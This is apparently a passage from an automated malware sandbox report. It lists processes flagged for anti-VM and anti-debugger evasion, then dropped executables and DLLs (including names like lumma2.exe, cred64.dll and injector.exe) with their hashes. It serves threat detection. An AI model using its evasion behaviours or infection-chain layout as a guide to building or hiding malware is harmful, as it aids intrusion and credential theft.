                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:216
                                        • C:\Users\Admin\AppData\Local\CanReuseTransform\gnprzklz\TypeId.exe
                                          C:\Users\Admin\AppData\Local\CanReuseTransform\gnprzklz\TypeId.exe
                                          1⤵
                                          • Executes dropped EXE
                                          PID:684
                                        • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                          C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                          1⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:6044
                                        • C:\Users\Admin\AppData\Local\Temp\cbrol.exe
                                          C:\Users\Admin\AppData\Local\Temp\cbrol.exe
                                          1⤵
                                            PID:3940

                                          Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\ProgramData\Are.docx

                                            Filesize

                                            11KB

                                            MD5

                                            a33e5b189842c5867f46566bdbf7a095

                                            SHA1

                                            e1c06359f6a76da90d19e8fd95e79c832edb3196

                                            SHA256

                                            5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                            SHA512

                                            f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                          • C:\ProgramData\mozglue.dll

                                            Filesize

                                            593KB

                                            MD5

                                            c8fd9be83bc728cc04beffafc2907fe9

                                            SHA1

                                            95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                            SHA256

                                            ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                            SHA512

                                            fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\alex1234.exe.log

                                            Filesize

                                            425B

                                            MD5

                                            605f809fab8c19729d39d075f7ffdb53

                                            SHA1

                                            c546f877c9bd53563174a90312a8337fdfc5fdd9

                                            SHA256

                                            6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556

                                            SHA512

                                            82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

                                          • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe

                                            Filesize

                                            200KB

                                            MD5

                                            8fe28d7ae1835a8981ce95c4bdd41bbd

                                            SHA1

                                            95220e7401fc078daac8cc742070524eee1d02a5

                                            SHA256

                                            9a3f8519dcb94e8c62e7a59b3430f17ed594b4d1c32a5d0d681185391161d25f

                                            SHA512

                                            2733d06c62125c6c9154c3d1517b34112ad7dfae8d53e45347148efa1a06ad1797a1ce0aa41e7411f54af5fb597c62af7ce56471e9016d8c717a2a5633921c87

                                          • C:\Users\Admin\AppData\Local\Temp\1000836001\osminog.exe

                                            Filesize

                                            534KB

                                            MD5

                                            a3f8b60a08da0f600cfce3bb600d5cb3

                                            SHA1

                                            b00d7721767b717b3337b5c6dade4ebf2d56345e

                                            SHA256

                                            0c608a9b1e70bf8b51a681a8390c8e4743501c45b84cf4d59727aba2fc33cadb

                                            SHA512

                                            14f63e415133ca438d3c217d5fb3ecf0ad76e19969c54d356f46282230230f1b254fbfc8ae5f78809dc189a9648be2dc1398927b3f089c525cd1105a3843f60d

                                          • C:\Users\Admin\AppData\Local\Temp\1000837001\goldprimeldlldf.exe

                                            Filesize

                                            464KB

                                            MD5

                                            c084d6f6ba40534fbfc5a64b21ef99ab

                                            SHA1

                                            0b4a17da83c0a8abbc8fab321931d5447b32b720

                                            SHA256

                                            afd83290a2adb219c3f1b8fbf23c27b0994fe76dfbb7dc0b416530dc0e21f624

                                            SHA512

                                            a5384a2f7029cf946fde44e1ff30775754ce525ca5a6fdac14184872b6e684cb6e585053cb86d32f82cbd3db48eb195ba3a642d8ee3774be579fccd993938ca1

                                          • C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe

                                            Filesize

                                            3.0MB

                                            MD5

                                            b5825382be3cd5c0f68726d13f247e2a

                                            SHA1

                                            0dc0371f1850c41fb2d6de30ab74e8c70cbb6e72

                                            SHA256

                                            01dd7c61b9febe841dc3155c7840a8851b02e9aa7b5c41ded5bc4f02e57ee98d

                                            SHA512

                                            8909b5544e89c090955372fd8d033eb1f60ce184e54fb14e5ca5cf36dd8f3a4d9d007f331693ba082893a5aa664d520d171fa6af8c540b99d10cc62a6377b482

                                          • C:\Users\Admin\AppData\Local\Temp\1000875001\amadka.exe

                                            Filesize

                                            1.8MB

                                            MD5

                                            444532fcd858195a7e6e08dc42d9b119

                                            SHA1

                                            d6648434771b3072314ae6f170a771f0f1e9408d

                                            SHA256

                                            3c0f5360b66ae1e40769081558167c5dbc9cd849998c1cc49d921a74acd610d1

                                            SHA512

                                            4f39c26eba4edfa95129f11ab43e38d54a259955b353788d57e820986fbe5fddf84f5e43436e5e1a99bfdb75898aa2f977d77a48cd6bf6e153feb2cecc5f89b2

                                          • C:\Users\Admin\AppData\Local\Temp\1000978001\fullwork.exe

                                            Filesize

                                            451KB

                                            MD5

                                            b2b60c50903a73efffcb4e33ce49238f

                                            SHA1

                                            9b6f27fc410748ae1570978d7a6aba95a1041eea

                                            SHA256

                                            29d409af265261b204f6eeeedb5e9bb1f7a829b723a5d1d78384066744bddbe1

                                            SHA512

                                            2c66a1615de77157f57c662de2e3ec97deb8cb6aadc0a03ff0acc3b269affd5ae0d50dfef85939ca9c1a8c6d47ff915061157e7da92dc286cb6ddd9b06a88126

                                          • C:\Users\Admin\AppData\Local\Temp\1000978001\fullwork.exe

                                            Filesize

                                            128KB

                                            MD5

                                            a68f2c5cdca061e1df33ab50a7777c6a

                                            SHA1

                                            3654c001618a5088197dab1705db2d2b1305f830

                                            SHA256

                                            212a8c3a917fead6e177e074e7dcbb4b2f43255670df760af5d9d6438b3b43e3

                                            SHA512

                                            bd38bc3391dd074c8df5431137d10e76736932e3ae8753b04c0c01ebed05e3054df2d330482b1288809bae7ca4ab5b90a6469a4a9207f5daefa20674428d8e6a

                                          • C:\Users\Admin\AppData\Local\Temp\1000979001\TeamFour.exe

                                            Filesize

                                            541KB

                                            MD5

                                            3b069f3dd741e4360f26cb27cb10320a

                                            SHA1

                                            6a9503aaf1e297f2696482ddf1bd4605a8710101

                                            SHA256

                                            f63bdc068c453e7e22740681a0c280d02745807b1695ce86e5067069beca533e

                                            SHA512

                                            bda58c074f7bd5171d7e3188a48cbdc457607ff06045e64a9e8e33fcb6f66f941d75a7bf57eb0ef262491622b4a9936342384237fa61c1add3365d5006c6d0d9

                                          • C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe

                                            Filesize

                                            1.7MB

                                            MD5

                                            85a15f080b09acace350ab30460c8996

                                            SHA1

                                            3fc515e60e4cfa5b3321f04a96c7fb463e4b9d02

                                            SHA256

                                            3a2006bc835a8ffe91b9ee9206f630b3172f42e090f4e8d90be620e540f5ef6b

                                            SHA512

                                            ade5e3531dfa1a01e6c2a69deb2962cbf619e766da3d6e8e3453f70ff55ccbcbe21381c7b97a53d67e1ca88975f4409b1a42a759e18f806171d29e4c3f250e9f

                                          • C:\Users\Admin\AppData\Local\Temp\1000986001\987123.exe

                                            Filesize

                                            231KB

                                            MD5

                                            7381ea960bed2021a7761d78049d038b

                                            SHA1

                                            9ab316797a88ddfe7d95a0e74801b5e1851ff640

                                            SHA256

                                            39020badb933ada4d9889ed670aec8831b759047e245583029cabe1d309ea1ed

                                            SHA512

                                            52cfe3fc7e104ae7d5057c47e4487402a8cbf152cbb19b2c36a0f2f935a421cf8f7a128d9a61d49ad200166a377f648db121f5a33517ebaeb2510251b690b27c

                                          • C:\Users\Admin\AppData\Local\Temp\1000999001\ISetup3.exe

                                            Filesize

                                            410KB

                                            MD5

                                            c2d63badae88b87da297268bf006b8a3

                                            SHA1

                                            b7983a8b1d5d438a80e401f5bc073aff8701735c

                                            SHA256

                                            db2589bbaa7edfece7d4bb233231b3cdeaa88ede4b1f34689adbfa35ca70de1d

                                            SHA512

                                            f1b9bec97e887f6eb9819ad61f99013cf77ced5570a51276ca90406675f5ae1458235b079ad5eeaed67fbf5be5177cc12508abe6f32455465d23ea2943c5fa20

                                          • C:\Users\Admin\AppData\Local\Temp\1001001001\yoffens_crypted_EASY.exe

                                            Filesize

                                            832KB

                                            MD5

                                            e3c0b0533534c6517afc94790d7b760c

                                            SHA1

                                            4de96db92debb740d007422089bed0bcddf0e974

                                            SHA256

                                            198edf9613054f8a569ac804bf23081fbfa8566270fff05bba9dc3c9a32d9952

                                            SHA512

                                            d12631796afca877c710b9308d1236fca1bfe3abe6582445d9df1bbb404160cff220316e3f600b3a87b46dd3bfb859734008b5c668e410466e82be9dc033249e

                                          • C:\Users\Admin\AppData\Local\Temp\1001002001\lumma2.exe

                                            Filesize

                                            322KB

                                            MD5

                                            3c30dbf2e7d57fdb7babdf49b87d8b31

                                            SHA1

                                            33e72f2e8e6b93a2ecffccba64650bda87e08e0d

                                            SHA256

                                            8d2c29f6d94f4375450e54b8d9fcd645beb7642d4240a4137e7c8539a57040d2

                                            SHA512

                                            c48c83d1d9d459720bea88aa7fb56c13d886fff9ab65deb0ace750d7d35a7b61c66b5d697e506ec152534d788f1641c51bcba38610ae66a6a8e08b0dabdc7657

                                          • C:\Users\Admin\AppData\Local\Temp\1001007001\blue2_A1.exe

                                            Filesize

                                            5.6MB

                                            MD5

                                            3abe68c3c880232b833c674d9b1034ce

                                            SHA1

                                            ab8d0c6b7871b01aadac9d8e775b2a305bc38a6b

                                            SHA256

                                            07632170506689c16d08c0ffe3b8ac37f959a35e5a4ac811e38318ac83b58f92

                                            SHA512

                                            bb44f8d068e360427fde7015d7b845ecd1f58f4f11317e6fa1a86f24a2744f23e5f60c9019818a800f4a01214513be4978126edda298778b3f9b19d8c7096351

                                          • C:\Users\Admin\AppData\Local\Temp\20E.exe

                                            Filesize

                                            232KB

                                            MD5

                                            c8eac1d34e880b19859663677cf6f469

                                            SHA1

                                            4a20b4a61b2172f675e5047b2ce82cc1cc9e7150

                                            SHA256

                                            47a23c0c61f2de27199085bde6f0d2f9b891e890d0e0ca9f7b37505ae7a0d69a

                                            SHA512

                                            bb42f71f910dab8dfe9f5c769a078bc48bc4d93fb301ee820bdbe37dea1916ac7828671a8f5b356697f154a6e6174da9fdc8c248d1149088e2763a1ff3d7acd2

                                          • C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

                                            Filesize

                                            256KB

                                            MD5

                                            01566bcbd39aec513bac63bfe31cde62

                                            SHA1

                                            a80079bb3d00c48650b11396046f49a3371e2ad4

                                            SHA256

                                            db9a581c58189f8e39379b10af0c36a6551b387d9cdd9f505e277a9bf001551a

                                            SHA512

                                            03356befdce493a8362f53b04d0a37f4f0617f209777e5037e867766657e58c8ef9987eb2f509cb234702af0d807e43af1f5ce402227534aaee2ecc6f49e775b

                                          • C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

                                            Filesize

                                            1.1MB

                                            MD5

                                            617e2cd3470cb96f3aa5ab71e409bbf9

                                            SHA1

                                            a95af84b2208f78903c30848bbf0149547a0f3cd

                                            SHA256

                                            063ed666cbfda51ff4cd567cef11a89ec5085ac38ad3dd821bfa32d5b10416a4

                                            SHA512

                                            e45ced1d7b52fc751d48e3ad82d7b2165252a65e3177d3f185469aa18e318e4d5484c49e31d19046b92a4fc36441cfcd27a954d6be3548fb35dece89c96ef101

                                          • C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

                                            Filesize

                                            4.1MB

                                            MD5

                                            c8564b4d627953e836d0faab99740a6a

                                            SHA1

                                            74b37a34950bd081d10072b4dae88952a4c52178

                                            SHA256

                                            051b0fe6b1d01ab0cc4dee0e7270b4dd54040a5c1783b78ea612bbf37d0c6f31

                                            SHA512

                                            77af3dd58d16effa1a307c174add6cdd1006b2a08add287388162bb2b7b3245a77e15375da1e508bcce10f024ab0e888b16862f087941e7b165834e8ae406776

                                          • C:\Users\Admin\AppData\Local\Temp\30D1.exe

                                            Filesize

                                            7.2MB

                                            MD5

                                            5eb23b5f7ea35da055fbf010ae00e01f

                                            SHA1

                                            a7d8c4fd57463ebe20952a0ddb25d647da700cc3

                                            SHA256

                                            fdfc254cf83ffbfd643d799b843c535b794b3116e2d9d1122513be8bf787a4b3

                                            SHA512

                                            2cbfb3cf57dca8956b8ef767e3b01a279d98cc3712d5722ca86d105a67deb5f5204a2ecfc0dce6c6d6aa50b13e6d48ef442a1657acc40b4ca249d950f7683096

                                          • C:\Users\Admin\AppData\Local\Temp\3B90.exe

                                            Filesize

                                            1.2MB

                                            MD5

                                            92efccb96dc166795f377e6720ed2b4f

                                            SHA1

                                            4c82eea8b4162dcb19aeddace05287102b77ebba

                                            SHA256

                                            c350d55523f28a062dc59438626cd8d95fc1c79b880ad51c2288289f0f4881cf

                                            SHA512

                                            f94745df42679758439601f61fcf36efd3755e508b3a28b6f3c346b696418064cd2a23943e90a173e00f66549f3d655ada73ca957522d1aeac40f3333927f099

                                          • C:\Users\Admin\AppData\Local\Temp\3B90.exe

                                            Filesize

                                            1.0MB

                                            MD5

                                            76c90292b3b49c7849a8d51db3b12fac

                                            SHA1

                                            f99eb12d1e6005deb74daaa05ac5b51146ae4c39

                                            SHA256

                                            d5df6f260b3fdb7cc5195c44c8ee754eb4c79ad026fad7007b8fafdfff90d53f

                                            SHA512

                                            f3bb1fcc50622aa17375055e7dec8fb5847473353003a860551465f6e939043268d8a3d3c1f93ed262277e5d07e4dd5f2afd31abf69714eb4403b9560e489575

                                          • C:\Users\Admin\AppData\Local\Temp\5822.exe

                                            Filesize

                                            1.8MB

                                            MD5

                                            cf03bdc20ea3733b3b7504b8c2b80c0c

                                            SHA1

                                            dc13cae80fe4c69c286ebd3c016d633a9e4ae5d3

                                            SHA256

                                            065e12d31345139cd23fd62e9b51f87bf9e0b4b6f9e12487b4b0bc6af375e98b

                                            SHA512

                                            b434905da512130b55b49e33ab6cdc3968400b6776461861512fb66a68f6e950c55dc18d7672f61e3091cd1fccd30b5a20578bd1d2e779e02c337bd83750d77c

                                          • C:\Users\Admin\AppData\Local\Temp\905.dll

                                            Filesize

                                            2.2MB

                                            MD5

                                            e69125300a060d1eb870d352de33e4c3

                                            SHA1

                                            60f2c2e6f2a4289a05b5c6212cdaf0d02dad82ea

                                            SHA256

                                            009de0571eb77c7ed594b9e5cda731e2953fd2198e00b25a0e2c4c4ef7414355

                                            SHA512

                                            257d3b61b2c85c1e71d2a80a5fbf44436e9734785fe6b0a643c1939dd01c1d8b98f1c454695296f7137ff035ec6c0118f053e4833e0be91618f2a9066a8cace9

                                          • C:\Users\Admin\AppData\Local\Temp\B278.exe

                                            Filesize

                                            6.0MB

                                            MD5

                                            9616b94d1dfc3b9edf589aff58f4bdf4

                                            SHA1

                                            f706267e360c0a729b111bb2f016585ce53252e5

                                            SHA256

                                            cbcd8f3ab7d6a3c49599e3c01f16b4a60b8b77742b8eda59033b1e343ca63107

                                            SHA512

                                            688f94612ff99c96d51872d4d0c204f8958837f6668bd40a7293d46500c5c22b28dc77184dc0fc3a74998304d9e445d57a9e4b00ee4e51379f9c66091d9ae305

                                          • C:\Users\Admin\AppData\Local\Temp\B278.exe

                                            Filesize

                                            7.0MB

                                            MD5

                                            cc00537a3146032e2ab4ac1e8c297863

                                            SHA1

                                            ac6d61b8db36d24e950ab44dbf13ef39a4e1b208

                                            SHA256

                                            c7e889b7bb6e698994b980ac687ffe36f92dad064b1f424a993ce066bbfe8e51

                                            SHA512

                                            c1f2f0c944315f4b6021a454f5ed9a767857c4be12d5f0f6f0fa27e346d349b03cb4d06942e8fcb641e866bd7eb84968345778b8f34ccca9db5574fc0b27cb18

                                          • C:\Users\Admin\AppData\Local\Temp\BC1D.exe

                                            Filesize

                                            805KB

                                            MD5

                                            be5370ddf8f47b4aebc8d25694f58dcf

                                            SHA1

                                            d1323a3c87709cd826bb840ebbe839feb7f1244e

                                            SHA256

                                            f6edb7e59d731ab6ef072b0c5477bcd3814ed2ae3ef37f634f8837720ec1203a

                                            SHA512

                                            fda3cd5a98157a229a43b6b5668da5705ddd07ada144ff9e2368be8089147e77fb1cecc91dfaa24e422070e6cdd76274784f301c38eb5fe944d0b929f842a4f4

                                          • C:\Users\Admin\AppData\Local\Temp\BC1D.exe

                                            Filesize

                                            661KB

                                            MD5

                                            93f6f74886e2526880d48e0556f34150

                                            SHA1

                                            d9ef723c5f355bc23352c60399b45e40b4bf1836

                                            SHA256

                                            8802d95ceca554bdd396b351fd833f94d219b17ad3c05827286a7c756c251ed4

                                            SHA512

                                            6f8a1a99794e30a010f5a776aac84031ad6627a6c6fa1dacb3f885e160d1476c1b962d481a2ed47b2bb617722ff10c82ca0ec19fd985134a8ad16d2bfd4bd7ca

                                          • C:\Users\Admin\AppData\Local\Temp\EasyAppns.exe

                                            Filesize

                                            64KB

                                            MD5

                                            01889c87188467ab7c97f97c4400a7bc

                                            SHA1

                                            1fa9a17b21e438851d09d3535db7fbd3f6d86fb7

                                            SHA256

                                            5342fabf4cbea9e0f055c65a93967f1638aa46c02bf2aa45ba64d87203de61ec

                                            SHA512

                                            d4a6441ddfb150068c080ed7c8a54fd4e2b4d60e539e8c05ab5e611b0dd0026b993321a90e71d9871503e71c3ec9afe0de59560f47b5e2549947f0efe41af083

                                          • C:\Users\Admin\AppData\Local\Temp\EasyAppns.exe

                                            Filesize

                                            988KB

                                            MD5

                                            065760220981039db19b9701aaeffddf

                                            SHA1

                                            318170b5ca3673cff578d89b7de116f9d6fcd961

                                            SHA256

                                            cac5a59708cebec195aed03baf2c20b32b277ea73738d054ba40a072719160bf

                                            SHA512

                                            81bb505365d1a10dd902f76b24ec111b519d17c0ede500b5c47d6eab9f187f95ac2897b09e7004762455a17cfb068a47c854fd9c29957e13832bb108a6385895

                                          • C:\Users\Admin\AppData\Local\Temp\GDHCGDGIEB.exe

                                            Filesize

                                            101KB

                                            MD5

                                            42b838cf8bdf67400525e128d917f6e0

                                            SHA1

                                            a578f6faec738912dba8c41e7abe1502c46d0cae

                                            SHA256

                                            0e4ffba62ce9a464aa1b7ff9f1e55ace8f51ff1e15102d856f801a81f8b4607d

                                            SHA512

                                            f64b39d885375251ab7db72c57dc5b5095f0c6412169f1035d1f6a25b8415a2a01004d06bfa0267cf683ef7dea7a9f969ad43fde5a4376f1fcb65a57403433c0

                                          • C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe

                                            Filesize

                                            404KB

                                            MD5

                                            383c48c7f64a6867db5b8577fa3abfbf

                                            SHA1

                                            926911f9581df56f5ac38fac01f6d45acdfb7dbd

                                            SHA256

                                            9b37a304f33bda4707c0dae60a20ac7c76c75752b0d06ad9fb2d6f07f8edd1b9

                                            SHA512

                                            53b5d42ed93ad6f1163ed00be8cd1b66d367fadf25853c16d8c6fb710f69d9e8a32cb85d0dbf36d95c85da16b214de2a564bc0750c264bb0547dd8910a6f4442

                                          • C:\Users\Admin\AppData\Local\Temp\Tmp6E21.tmp

                                            Filesize

                                            2KB

                                            MD5

                                            1420d30f964eac2c85b2ccfe968eebce

                                            SHA1

                                            bdf9a6876578a3e38079c4f8cf5d6c79687ad750

                                            SHA256

                                            f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

                                            SHA512

                                            6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ryvrfif3.ylv.ps1

                                            Filesize

                                            1B

                                            MD5

                                            c4ca4238a0b923820dcc509a6f75849b

                                            SHA1

                                            356a192b7913b04c54574d18c28d46e6395428ab

                                            SHA256

                                            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                            SHA512

                                            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                          • C:\Users\Admin\AppData\Local\Temp\april.exe

                                            Filesize

                                            1.2MB

                                            MD5

                                            1e7b889e3a5ece18e870ef2ba00de2e2

                                            SHA1

                                            56d9f43ec7808d0acad67c27ce73df34608f1eb4

                                            SHA256

                                            9c0c9e2d09ccc75033be54ffce60d52ec553e0bfd7b6415f2f570e1ea95723cf

                                            SHA512

                                            d41a75022fce7e3eb25f778aedc9b40df3342d0a0f8165bf03acde3d92548f3ae55e05f8f27285e71d4a57e6439a3f58911047713adb9cbadcf34669fac57f9a

                                          • C:\Users\Admin\AppData\Local\Temp\april.exe

                                            Filesize

                                            1.2MB

                                            MD5

                                            3b622cdf6d4abee9f90ad6b29f57d951

                                            SHA1

                                            cb7cbde21fa9e8ce102f5cffb2d6efd99dc76e52

                                            SHA256

                                            9f50f021ddadccc827fdf342e72e8f2ce8f3f62b8af833d56d16088ec8588c6b

                                            SHA512

                                            01914ca2ab14aef6492bd30568b30f08f45f6bf945971d262180edda5fdd7614d84a77e8cb18dc64aaf39d19cffda75237bf7597cc80dd5ee0d062081fba3279

                                          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

                                            Filesize

                                            281KB

                                            MD5

                                            d98e33b66343e7c96158444127a117f6

                                            SHA1

                                            bb716c5509a2bf345c6c1152f6e3e1452d39d50d

                                            SHA256

                                            5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

                                            SHA512

                                            705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

                                          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

                                            Filesize

                                            4KB

                                            MD5

                                            09fe8010ffafcb93ac7bdcaf3073580a

                                            SHA1

                                            ce076ecff91d4a023921d1c61a76d8645b28f602

                                            SHA256

                                            5437890a185e6e569cea232ad9a51e08a8b02473c5aa6060d24bf0ba40ff81fe

                                            SHA512

                                            70d4ddc5f600942ef9ef23090893b86b7aec570bdd2e0f9c13640ca301354e7d20dccc73aa4b05042c0c4ad546aeb3b65200d48cad16725f5db860d7b0b6a9c6

                                          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

                                            Filesize

                                            3KB

                                            MD5

                                            ae4f249760c15081839c3f38ad37305a

                                            SHA1

                                            4a69cb27d3fa4859ba74204a935778f9e830c38c

                                            SHA256

                                            f0be720297e326ff5f5650d95a9209a0d3e9156bb387f99f65ab8ffebd1cd781

                                            SHA512

                                            a7e254730a3cfdef6c46b682762f0025a3b7d91e4bd65539e220255c236ba576d1cf8bbabd44a0861dad7a802097a2e090ada9da04ef9e215d04d310c9b9883a

                                          • C:\Users\Admin\AppData\Local\Temp\is-OB1P9.tmp\april.tmp

                                            Filesize

                                            677KB

                                            MD5

                                            8519bfba2d14dbdca979e73c62ed4b46

                                            SHA1

                                            388030278d4f7e4d88754adc3ff95df54e01eda9

                                            SHA256

                                            6848c671e27c33dd065e1d70c9be0a4205ad69ec9b4b4b356d03eb8dc73ddeb5

                                            SHA512

                                            a1bfd50e48a82f7b100de76674a082eb77ac385b7ccc5ba574f45b97e2e4a992541a992b979b266b9e6bd27eddec02f943b776ed0210d5b788954e15463921aa

                                          • C:\Users\Admin\AppData\Local\Temp\tmp9726.tmp

                                            Filesize

                                            46KB

                                            MD5

                                            02d2c46697e3714e49f46b680b9a6b83

                                            SHA1

                                            84f98b56d49f01e9b6b76a4e21accf64fd319140

                                            SHA256

                                            522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

                                            SHA512

                                            60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

                                          • C:\Users\Admin\AppData\Local\Temp\u2o.0.exe

                                            Filesize

                                            261KB

                                            MD5

                                            606625739201aa74813d211613b2aa82

                                            SHA1

                                            4409efa953358e31d940d698470bd0e2d952e8a7

                                            SHA256

                                            848e37628e8301c0845cab2eab491e49995db81fec86dec3841af2fc6ee584e2

                                            SHA512

                                            d6c1dff70bec93e54a1fa4dc420a2e1ca78955d9b5e1f25324732cb55dbe79642a949d5ffe7218d3b9e6534287f9924286d0eaa765cfd73b5f52f84924ef99f1

                                          • C:\Users\Admin\AppData\Local\Temp\u2o.1.exe

                                            Filesize

                                            3.9MB

                                            MD5

                                            7c8087cfe6b177e1a188b3876aa0ca53

                                            SHA1

                                            378093117ccf3d386efcb32ff8325a6343dd7a68

                                            SHA256

                                            2d0839bcba5d0fc63d3f35a9924d50fe560836a9160fad648a9c53d986edf0c9

                                            SHA512

                                            d246dccb90553185717b92077272a8896ee821fe3628789faf1bbea62a652d00f06b48106794e2e061b7f1426a3fb768e0c3aca19821e221ba4f958ac1e224c8

                                          • C:\Users\Admin\AppData\Local\Temp\u3g8.1.exe

                                            Filesize

                                            4.4MB

                                            MD5

                                            e3662159c5f8ec47a899835b6599b0eb

                                            SHA1

                                            39a3ba46639d27bc4ee949c2dbe1a320cf3df6cc

                                            SHA256

                                            050776633533ef458deac9c240663ccea4501235eb8fddc79db95d8c08ba9d23

                                            SHA512

                                            077681ff18405e25a022ec6749633784650a9bf8135b485a68cdbdc34d8ff02e996ae356dc9ce1714a9e59c3d5ff5fa7af6f2cdcbbb0bcd51218def87dac6b4a

                                          • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

                                            Filesize

                                            109KB

                                            MD5

                                            2afdbe3b99a4736083066a13e4b5d11a

                                            SHA1

                                            4d4856cf02b3123ac16e63d4a448cdbcb1633546

                                            SHA256

                                            8d31b39170909595b518b1a03e9ec950540fabd545ed14817cac5c84b91599ee

                                            SHA512

                                            d89b3c46854153e60e3fa825b394344eee33936d7dbf186af9d95c9adae54428609e3bf21a18d38fce3d96f3e0b8e4e0ed25cb5004fbe288de3aef3a85b1d93f

                                          • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

                                            Filesize

                                            1.2MB

                                            MD5

                                            92fbdfccf6a63acef2743631d16652a7

                                            SHA1

                                            971968b1378dd89d59d7f84bf92f16fc68664506

                                            SHA256

                                            b4588feacc183cd5a089f9bb950827b75df04bd5a6e67c95ff258e4a34aa0d72

                                            SHA512

                                            b8ea216d4a59d8858fd4128abb555f8dcf3acca9138e663b488f09dc5200db6dc11ecc235a355e801145bbbb44d7beac6147949d75d78b32fe9cfd2fa200d117

                                          • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll

                                            Filesize

                                            109KB

                                            MD5

                                            726cd06231883a159ec1ce28dd538699

                                            SHA1

                                            404897e6a133d255ad5a9c26ac6414d7134285a2

                                            SHA256

                                            12fef2d5995d671ec0e91bdbdc91e2b0d3c90ed3a8b2b13ddaa8ad64727dcd46

                                            SHA512

                                            9ea82e7cb6c6a58446bd5033855947c3e2d475d2910f2b941235e0b96aa08eec822d2dd17cc86b2d3fce930f78b799291992408e309a6c63e3011266810ea83e

                                          • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll

                                            Filesize

                                            448KB

                                            MD5

                                            1c8b9196c4f59ad4f34e0fab33217d53

                                            SHA1

                                            8d643a04a62875031cfdffb6e785e3cc5801e828

                                            SHA256

                                            ef4db25d4d8ac0a1a1f6abe96539858beec7047c7f269c8ad25fc71e8bf2660e

                                            SHA512

                                            f185827eaf124710b2c9a5e3bfb28973ab9bee4e510b12e2f3f19f475363efbf52ec88f98612d1ac8b00927533e11aa30f66e4241eceb5d546a6d9e197da41ac

                                          • C:\Users\Public\Music\EasyApp.exe

                                            Filesize

                                            341KB

                                            MD5

                                            0e49e66fd0e90ac46ad9f027df419048

                                            SHA1

                                            357559abc784e69245db2e4302c838913df618b2

                                            SHA256

                                            599fbee1c0335d5f8efae7ed35eed9700001841005158a1c8c6648b53a6e4bda

                                            SHA512

                                            38aa37d633795de8ad65749a11da261e9f3aa2e1f285cd95e89a895c76e28a7d1fb72e87776013e8b508b9201d1b7ce92462c85cb4e3d55d5cf9b5a802479fed

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                            Filesize

                                            2KB

                                            MD5

                                            db01a2c1c7e70b2b038edf8ad5ad9826

                                            SHA1

                                            540217c647a73bad8d8a79e3a0f3998b5abd199b

                                            SHA256

                                            413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

                                            SHA512

                                            c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                            Filesize

                                            18KB

                                            MD5

                                            3531e4c1fe13142ed8ac42085d64ae62

                                            SHA1

                                            fee1f3746856481894edacc6d0de20e272f33d74

                                            SHA256

                                            6edaa723f28e4fc7c4aef56b1d5aaba04a23abb47215e54ff04b42f1c4953b4b

                                            SHA512

